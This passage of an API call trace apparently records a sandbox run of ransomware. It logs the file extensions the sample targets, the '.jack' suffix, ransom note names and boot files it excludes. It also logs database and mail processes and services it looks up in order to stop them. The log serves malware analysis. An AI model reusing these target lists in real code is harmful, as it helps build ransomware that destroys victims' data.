Flags=0x0, Ptr=0x659820, Size=0x400) returned 0x65a7b0 [0190.606] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x65a160 [0190.606] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x65a148 [0190.606] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x65a280 [0190.606] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x65a190 [0190.606] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x65a298 [0190.606] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x65a130 [0190.606] lstrlenW (lpString=".1cd;.3ds;.3fr;.3g2;.3gp;.7z;.accda;.accdb;.accdc;.accde;.accdt;.accdw;.adb;.adp;.ai;.ai3;.ai4;.ai5;.ai6;.ai7;.ai8;.anim;.arw;.as;.asa;.asc;.ascx;.asm;.asmx;.asp;.aspx;.asr;.asx;.avi;.avs;.backup;.bak;.bay;.bd;.bin;.bmp;.bz2;.c;.cdr;.cer;.cf;.cfc;.cfm;.cfml;.cfu;.chm;.cin;.class;.clx;.config;.cpp;.cr2;.crt;.crw;.cs;.css;.csv;.cub;.dae;.dat;.db;.dbf;.dbx;.dc3;.dcm;.dcr;.der;.dib;.dic;.dif;.divx;.djvu;.dng;.doc;.docm;.docx;.dot;.dotm;.dotx;.dpx;.dqy;.dsn;.dt;.dtd;.dwg;.dwt;.dx;.dxf;.edml;.efd;.elf;.emf;.emz;.epf;.eps;.epsf;.epsp;.erf;.exr;.f4v;.fido;.flm;.flv;.frm;.fxg;.geo;.gif;.grs;.gz;.h;.hdr;.hpp;.hta;.htc;.htm;.html;.icb;.ics;.iff;.inc;.indd;.ini;.iqy;.j2c;.j2k;.java;.jp2;.jpc;.jpe;.jpeg;.jpf;.jpg;.jpx;.js;.jsf;.json;.jsp;.kdc;.kmz;.kwm;.lasso;.lbi;.lgf;.lgp;.log;.m1v;.m4a;.m4v;.max;.md;.mda;.mdb;.mde;.mdf;.mdw;.mef;.mft;.mfw;.mht;.mhtml;.mka;.mkidx;.mkv;.mos;.mov;.mp3;.mp4;.mpeg;.mpg;.mpv;.mrw;.msg;.mxl;.myd;.myi;.nef;.nrw;.obj;.odb;.odc;.odm;.odp;.ods;.oft;.one;.onepkg;.onetoc2;.opt;.oqy;.orf;.p12;.p7b;.p7c;.pam;.pbm;.pct;.pcx;.pdd;.pdf;.pdp;.pef;.pem;.pff;.pfm;.pfx;.pgm;.php;.php3;.php4;.php5;.phtml;.pict;.pl;.pls;.pm;.png;.pnm;.pot;.potm;.potx;.ppa;.ppam;.ppm;.pps;.ppsm;.ppt;.pptm;.pptx;.prn;.ps;.psb;.psd;.pst;.ptx;.pub;.pwm;.pxr;.py;.qt;.r3d;.raf;.rar;.raw;.rdf;.rgbe;.rle;.rqy;.rss;.rtf;.rw2;.rwl;.safe;.sct;.sdpx;.shtm;.shtml;.slk;.sln;.sql;.sr2;.srf;.srw;.ssi;.st;.stm;.svg;.svgz;.swf;.tab;.tar;.tbb;.tbi;.tbk;.tdi;.tga;.thmx;.tif;.tiff;.tld;.torrent;.tpl;.txt;.u3d;.udl;.uxdc;.vb;.vbs;.vcs;.vda;.vdr;.vdw;.vdx;.vrp;.vsd;.vss;.vst;.vsw;.vsx;.vtm;.vtml;.vtx;.wb2;.wav;.wbm;.wbmp;.wim;.wmf;.wml;.wmv;.wpd;.wps;.x3f;.xl;.xla;.xlam;.xlk;.xlm;.xls;.xlsb;.xlsm;.xlsx;.xlt;.xltm;.xltx;.xlw;.xml;.xps;.xsd;.xsf;.xsl;.xslt;.xsn;.xtp;.xtp2;.xyze;.xz;.zip;") returned 1776 [0190.606] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d9c20 | out: hHeap=0x5e0000) returned 1 [0190.606] lstrlenW (lpString="") returned 0 [0190.606] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6dc810 | out: hHeap=0x5e0000) returned 1 [0190.606] lstrlenW (lpString=".jack") returned 5 [0190.607] lstrlenW (lpString=".jack") returned 5 [0190.607] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6dc810 | out: hHeap=0x5e0000) returned 1 [0190.607] lstrlenW (lpString="boot.ini;bootfont.bin;ntldr;ntdetect.com;io.sys;") returned 48 [0190.607] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6078d0 | out: hHeap=0x5e0000) returned 1 [0190.607] lstrlenW (lpString="RETURN FILES.txt") returned 16 [0190.607] lstrlenW (lpString="RETURN FILES.txt") returned 16 [0190.607] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60abb8 | out: hHeap=0x5e0000) returned 1 [0190.607] lstrlenW (lpString="Info.hta") returned 8 [0190.607] lstrlenW (lpString="Info.hta") returned 8 [0190.607] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6012c8 | out: hHeap=0x5e0000) returned 1 [0190.607] lstrlenW (lpString="Pg.exe") returned 6 [0190.607] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69 [0190.607] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5ef030 | out: hHeap=0x5e0000) returned 1 [0190.607] ExpandEnvironmentStringsW (in: lpSrc="%windir%;", lpDst=0x2365fc0, nSize=0x8000 | out: lpDst="C:\\WINDOWS;") returned 0xc [0190.607] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x2375fc8 | out: hHeap=0x5e0000) returned 1 [0190.607] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x2365fc0 | out: hHeap=0x5e0000) returned 1 [0190.608] lstrlenW (lpString="%windir%;") returned 9 [0190.608] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x601688 | out: hHeap=0x5e0000) returned 1 [0190.608] lstrlenW (lpString="C:\\WINDOWS;") returned 11 [0190.608] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x2355fb8 | out: hHeap=0x5e0000) returned 1 [0190.608] lstrlenW (lpString="doc(.doc;.docx;.pdf;.xls;.xlsx;.ppt;)arc(.zip;.rar;.bz2;.7z;)dbf(.dbf;)1c8(.1cd;)jpg(.jpg;)") returned 91 [0190.608] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5ef030 | out: hHeap=0x5e0000) returned 1 [0190.608] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%", lpDst=0x2355fb8, nSize=0x7fff | out: lpDst="C:") returned 0x3 [0190.608] lstrlenW (lpString="C:\\") returned 3 [0190.608] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x19dce0, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x19dce0*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0190.609] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x2355fb8 | out: hHeap=0x5e0000) returned 1 [0190.610] lstrlenW (lpString="%systemdrive%") returned 13 [0190.610] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6012c8 | out: hHeap=0x5e0000) returned 1 [0190.610] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6078d0 | out: hHeap=0x5e0000) returned 1 [0190.610] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60d370 | out: hHeap=0x5e0000) returned 1 [0190.610] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4091f0, lpParameter=0x2345f98, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x354 [0190.611] lstrlenW (lpString=".1cd;.3ds;.3fr;.3g2;.3gp;.7z;.accda;.accdb;.accdc;.accde;.accdt;.accdw;.adb;.adp;.ai;.ai3;.ai4;.ai5;.ai6;.ai7;.ai8;.anim;.arw;.as;.asa;.asc;.ascx;.asm;.asmx;.asp;.aspx;.asr;.asx;.avi;.avs;.backup;.bak;.bay;.bd;.bin;.bmp;.bz2;.c;.cdr;.cer;.cf;.cfc;.cfm;.cfml;.cfu;.chm;.cin;.class;.clx;.config;.cpp;.cr2;.crt;.crw;.cs;.css;.csv;.cub;.dae;.dat;.db;.dbf;.dbx;.dc3;.dcm;.dcr;.der;.dib;.dic;.dif;.divx;.djvu;.dng;.doc;.docm;.docx;.dot;.dotm;.dotx;.dpx;.dqy;.dsn;.dt;.dtd;.dwg;.dwt;.dx;.dxf;.edml;.efd;.elf;.emf;.emz;.epf;.eps;.epsf;.epsp;.erf;.exr;.f4v;.fido;.flm;.flv;.frm;.fxg;.geo;.gif;.grs;.gz;.h;.hdr;.hpp;.hta;.htc;.htm;.html;.icb;.ics;.iff;.inc;.indd;.ini;.iqy;.j2c;.j2k;.java;.jp2;.jpc;.jpe;.jpeg;.jpf;.jpg;.jpx;.js;.jsf;.json;.jsp;.kdc;.kmz;.kwm;.lasso;.lbi;.lgf;.lgp;.log;.m1v;.m4a;.m4v;.max;.md;.mda;.mdb;.mde;.mdf;.mdw;.mef;.mft;.mfw;.mht;.mhtml;.mka;.mkidx;.mkv;.mos;.mov;.mp3;.mp4;.mpeg;.mpg;.mpv;.mrw;.msg;.mxl;.myd;.myi;.nef;.nrw;.obj;.odb;.odc;.odm;.odp;.ods;.oft;.one;.onepkg;.onetoc2;.opt;.oqy;.orf;.p12;.p7b;.p7c;.pam;.pbm;.pct;.pcx;.pdd;.pdf;.pdp;.pef;.pem;.pff;.pfm;.pfx;.pgm;.php;.php3;.php4;.php5;.phtml;.pict;.pl;.pls;.pm;.png;.pnm;.pot;.potm;.potx;.ppa;.ppam;.ppm;.pps;.ppsm;.ppt;.pptm;.pptx;.prn;.ps;.psb;.psd;.pst;.ptx;.pub;.pwm;.pxr;.py;.qt;.r3d;.raf;.rar;.raw;.rdf;.rgbe;.rle;.rqy;.rss;.rtf;.rw2;.rwl;.safe;.sct;.sdpx;.shtm;.shtml;.slk;.sln;.sql;.sr2;.srf;.srw;.ssi;.st;.stm;.svg;.svgz;.swf;.tab;.tar;.tbb;.tbi;.tbk;.tdi;.tga;.thmx;.tif;.tiff;.tld;.torrent;.tpl;.txt;.u3d;.udl;.uxdc;.vb;.vbs;.vcs;.vda;.vdr;.vdw;.vdx;.vrp;.vsd;.vss;.vst;.vsw;.vsx;.vtm;.vtml;.vtx;.wb2;.wav;.wbm;.wbmp;.wim;.wmf;.wml;.wmv;.wpd;.wps;.x3f;.xl;.xla;.xlam;.xlk;.xlm;.xls;.xlsb;.xlsm;.xlsx;.xlt;.xltm;.xltx;.xlw;.xml;.xps;.xsd;.xsf;.xsl;.xslt;.xsn;.xtp;.xtp2;.xyze;.xz;.zip;") returned 1776 [0190.611] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d9c20 | out: hHeap=0x5e0000) returned 1 [0190.611] lstrlenW (lpString="") returned 0 [0190.611] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x2379298 | out: hHeap=0x5e0000) returned 1 [0190.611] lstrlenW (lpString=".jack") returned 5 [0190.611] lstrlenW (lpString=".jack") returned 5 [0190.611] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x2379238 | out: hHeap=0x5e0000) returned 1 [0190.611] lstrlenW (lpString="boot.ini;bootfont.bin;ntldr;ntdetect.com;io.sys;") returned 48 [0190.611] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d9cd0 | out: hHeap=0x5e0000) returned 1 [0190.611] lstrlenW (lpString="RETURN FILES.txt") returned 16 [0190.611] lstrlenW (lpString="RETURN FILES.txt") returned 16 [0190.611] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60b158 | out: hHeap=0x5e0000) returned 1 [0190.611] lstrlenW (lpString="Info.hta") returned 8 [0190.611] lstrlenW (lpString="Info.hta") returned 8 [0190.611] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x601520 | out: hHeap=0x5e0000) returned 1 [0190.611] lstrlenW (lpString="Pg.exe") returned 6 [0190.612] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69 [0190.612] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5ef030 | out: hHeap=0x5e0000) returned 1 [0190.612] ExpandEnvironmentStringsW (in: lpSrc="%windir%;", lpDst=0x23797f8, nSize=0x8000 | out: lpDst="C:\\WINDOWS;") returned 0xc [0190.612] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x2389800 | out: hHeap=0x5e0000) returned 1 [0190.612] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x23797f8 | out: hHeap=0x5e0000) returned 1 [0190.612] lstrlenW (lpString="%windir%;") returned 9 [0190.612] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x601688 | out: hHeap=0x5e0000) returned 1 [0190.613] lstrlenW (lpString="C:\\WINDOWS;") returned 11 [0190.613] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x2367fe0 | out: hHeap=0x5e0000) returned 1 [0190.613] lstrlenW (lpString="doc(.doc;.docx;.pdf;.xls;.xlsx;.ppt;)arc(.zip;.rar;.bz2;.7z;)dbf(.dbf;)1c8(.1cd;)jpg(.jpg;)") returned 91 [0190.613] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x2368c68 | out: hHeap=0x5e0000) returned 1 [0190.613] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%", lpDst=0x23797f8, nSize=0x7fff | out: lpDst="C:") returned 0x3 [0190.613] lstrlenW (lpString="C:\\") returned 3 [0190.613] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x19dce0, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x19dce0*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0190.614] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x23797f8 | out: hHeap=0x5e0000) returned 1 [0190.615] lstrlenW (lpString="%systemdrive%") returned 13 [0190.615] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x601688 | out: hHeap=0x5e0000) returned 1 [0190.615] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d9f78 | out: hHeap=0x5e0000) returned 1 [0190.615] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x65a8c0 | out: hHeap=0x5e0000) returned 1 [0190.615] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4091f0, lpParameter=0x2357fc0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x364 [0190.616] WaitForMultipleObjects (nCount=0x2, lpHandles=0x601a30*=0x354, bWaitAll=1, dwMilliseconds=0xffffffff) Thread: id = 2 os_tid = 0xa28 Thread: id = 3 os_tid = 0xaf0 Thread: id = 4 os_tid = 0xdf8 Thread: id = 5 os_tid = 0xf18 Thread: id = 6 os_tid = 0xd08 Thread: id = 8 os_tid = 0xea8 [0190.617] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x2379298 [0190.617] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x2379298, Size=0x20) returned 0x6012c8 [0190.617] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x6012c8, Size=0x40) returned 0x60b398 [0190.617] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x60b398, Size=0x80) returned 0x6d9f78 [0190.618] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x6d9f78, Size=0x100) returned 0x2368008 [0190.618] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x2379298 [0190.618] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x2379298, Size=0x20) returned 0x6012c8 [0190.618] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x6012c8, Size=0x40) returned 0x60b350 [0190.618] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x60b350, Size=0x80) returned 0x6dab28 [0190.618] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x6dab28, Size=0x100) returned 0x2368428 [0190.618] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x2379298 [0190.618] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x4) returned 0x65a880 [0190.618] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x2379358 [0190.618] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x65a880, Size=0x8) returned 0x65a8c0 [0190.618] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x14) returned 0x5fc418 [0190.618] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x65a8c0, Size=0x10) returned 0x2379388 [0190.618] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x18) returned 0x5fc6f8 [0190.618] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x1a) returned 0x6012c8 [0190.618] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x2379388, Size=0x20) returned 0x601688 [0190.618] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x1c) returned 0x5eac78 [0190.618] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x16) returned 0x5fc578 [0190.618] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x1a) returned 0x236bbc0 [0190.618] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x2379388 [0190.618] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x4) returned 0x65a880 [0190.618] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x40) returned 0x60ac90 [0190.618] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x65a880, Size=0x8) returned 0x65a8c0 [0190.618] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x3c) returned 0x60af60 [0190.618] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x65a8c0, Size=0x10) returned 0x23793d0 [0190.618] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x14) returned 0x5fc658 [0190.618] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x18) returned 0x5fc778 [0190.618] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x23793d0, Size=0x20) returned 0x236ba80 [0190.618] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x24) returned 0x2369708 [0190.618] lstrlenW (lpString="1c8.exe;1cv77.exe;outlook.exe;postgres.exe;mysqld-nt.exe;mysqld.exe;sqlservr.exe;") returned 81 [0190.618] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x2368008 | out: hHeap=0x5e0000) returned 1 [0190.619] lstrlenW (lpString="FirebirdGuardianDefaultInstance;FirebirdServerDefaultInstance;sqlwriter;mssqlserver;sqlserveradhelper;") returned 102 [0190.619] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x2368428 | out: hHeap=0x5e0000) returned 1 [0190.619] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x236b8f0 [0190.619] EnumServicesStatusExW (in: hSCManager=0x236b8f0, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x291ff3c, lpServicesReturned=0x291ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x291ff3c, lpServicesReturned=0x291ff54, lpResumeHandle=0x0) returned 0 [0190.619] GetLastError () returned 0xea [0190.619] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x2090) returned 0x236c150 [0190.619] EnumServicesStatusExW (in: hSCManager=0x236b8f0, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x236c150, cbBufSize=0x2090, pcbBytesNeeded=0x291ff3c, lpServicesReturned=0x291ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x236c150, pcbBytesNeeded=0x291ff3c, lpServicesReturned=0x291ff54, lpResumeHandle=0x0) returned 1 [0190.620] CloseServiceHandle (hSCObject=0x236b8f0) returned 1 [0190.620] lstrlenW (lpString="Appinfo") returned 7 [0190.620] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0190.620] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0190.620] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0190.620] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0190.620] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0190.620] lstrlenW (lpString="AppXSvc") returned 7 [0190.620] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AppXSvc") returned 1 [0190.621] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AppXSvc") returned 1 [0190.621] lstrcmpiW (lpString1="sqlwriter", lpString2="AppXSvc") returned 1 [0190.621] lstrcmpiW (lpString1="mssqlserver", lpString2="AppXSvc") returned 1 [0190.621] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AppXSvc") returned 1 [0190.621] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0190.621] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0190.621] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0190.621] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0190.621] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0190.621] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0190.621] lstrlenW (lpString="Audiosrv") returned 8 [0190.621] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Audiosrv") returned 1 [0190.621] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Audiosrv") returned 1 [0190.621] lstrcmpiW (lpString1="sqlwriter", lpString2="Audiosrv") returned 1 [0190.621] lstrcmpiW (lpString1="mssqlserver", lpString2="Audiosrv") returned 1 [0190.621] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Audiosrv") returned 1 [0190.621] lstrlenW (lpString="BFE") returned 3 [0190.621] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0190.621] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0190.621] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0190.621] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0190.621] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0190.621] lstrlenW (lpString="BITS") returned 4 [0190.621] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BITS") returned 1 [0190.621] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BITS") returned 1 [0190.621] lstrcmpiW (lpString1="sqlwriter", lpString2="BITS") returned 1 [0190.621] lstrcmpiW (lpString1="mssqlserver", lpString2="BITS") returned 1 [0190.621] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BITS") returned 1 [0190.621] lstrlenW (lpString="BrokerInfrastructure") returned 20 [0190.621] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0190.621] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0190.621] lstrcmpiW (lpString1="sqlwriter", lpString2="BrokerInfrastructure") returned 1 [0190.621] lstrcmpiW (lpString1="mssqlserver", lpString2="BrokerInfrastructure") returned 1 [0190.621] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BrokerInfrastructure") returned 1 [0190.621] lstrlenW (lpString="CDPSvc") returned 6 [0190.621] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CDPSvc") returned 1 [0190.622] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CDPSvc") returned 1 [0190.622] lstrcmpiW (lpString1="sqlwriter", lpString2="CDPSvc") returned 1 [0190.622] lstrcmpiW (lpString1="mssqlserver", lpString2="CDPSvc") returned 1 [0190.622] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CDPSvc") returned 1 [0190.622] lstrlenW (lpString="ClickToRunSvc") returned 13 [0190.622] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0190.622] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0190.622] lstrcmpiW (lpString1="sqlwriter", lpString2="ClickToRunSvc") returned 1 [0190.622] lstrcmpiW (lpString1="mssqlserver", lpString2="ClickToRunSvc") returned 1 [0190.622] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClickToRunSvc") returned 1 [0190.622] lstrlenW (lpString="ClipSVC") returned 7 [0190.622] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClipSVC") returned 1 [0190.622] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClipSVC") returned 1 [0190.622] lstrcmpiW (lpString1="sqlwriter", lpString2="ClipSVC") returned 1 [0190.622] lstrcmpiW (lpString1="mssqlserver", lpString2="ClipSVC") returned 1 [0190.622] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClipSVC") returned 1 [0190.622] lstrlenW (lpString="CoreMessagingRegistrar") returned 22 [0190.622] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0190.622] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0190.622] lstrcmpiW (lpString1="sqlwriter", lpString2="CoreMessagingRegistrar") returned 1 [0190.622] lstrcmpiW (lpString1="mssqlserver", lpString2="CoreMessagingRegistrar") returned 1 [0190.622] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CoreMessagingRegistrar") returned 1 [0190.622] lstrlenW (lpString="CryptSvc") returned 8 [0190.622] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0190.622] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0190.622] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0190.622] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0190.622] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0190.622] lstrlenW (lpString="DcomLaunch") returned 10 [0190.622] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0190.622] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0190.622] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0190.622] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0190.622] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0190.622] lstrlenW (lpString="DeviceAssociationService") returned 24 [0190.622] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0190.622] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0190.622] lstrcmpiW (lpString1="sqlwriter", lpString2="DeviceAssociationService") returned 1 [0190.623] lstrcmpiW (lpString1="mssqlserver", lpString2="DeviceAssociationService") returned 1 [0190.623] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DeviceAssociationService") returned 1 [0190.623] lstrlenW (lpString="Dhcp") returned 4 [0190.623] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0190.623] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0190.623] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0190.623] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0190.623] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0190.623] lstrlenW (lpString="Dnscache") returned 8 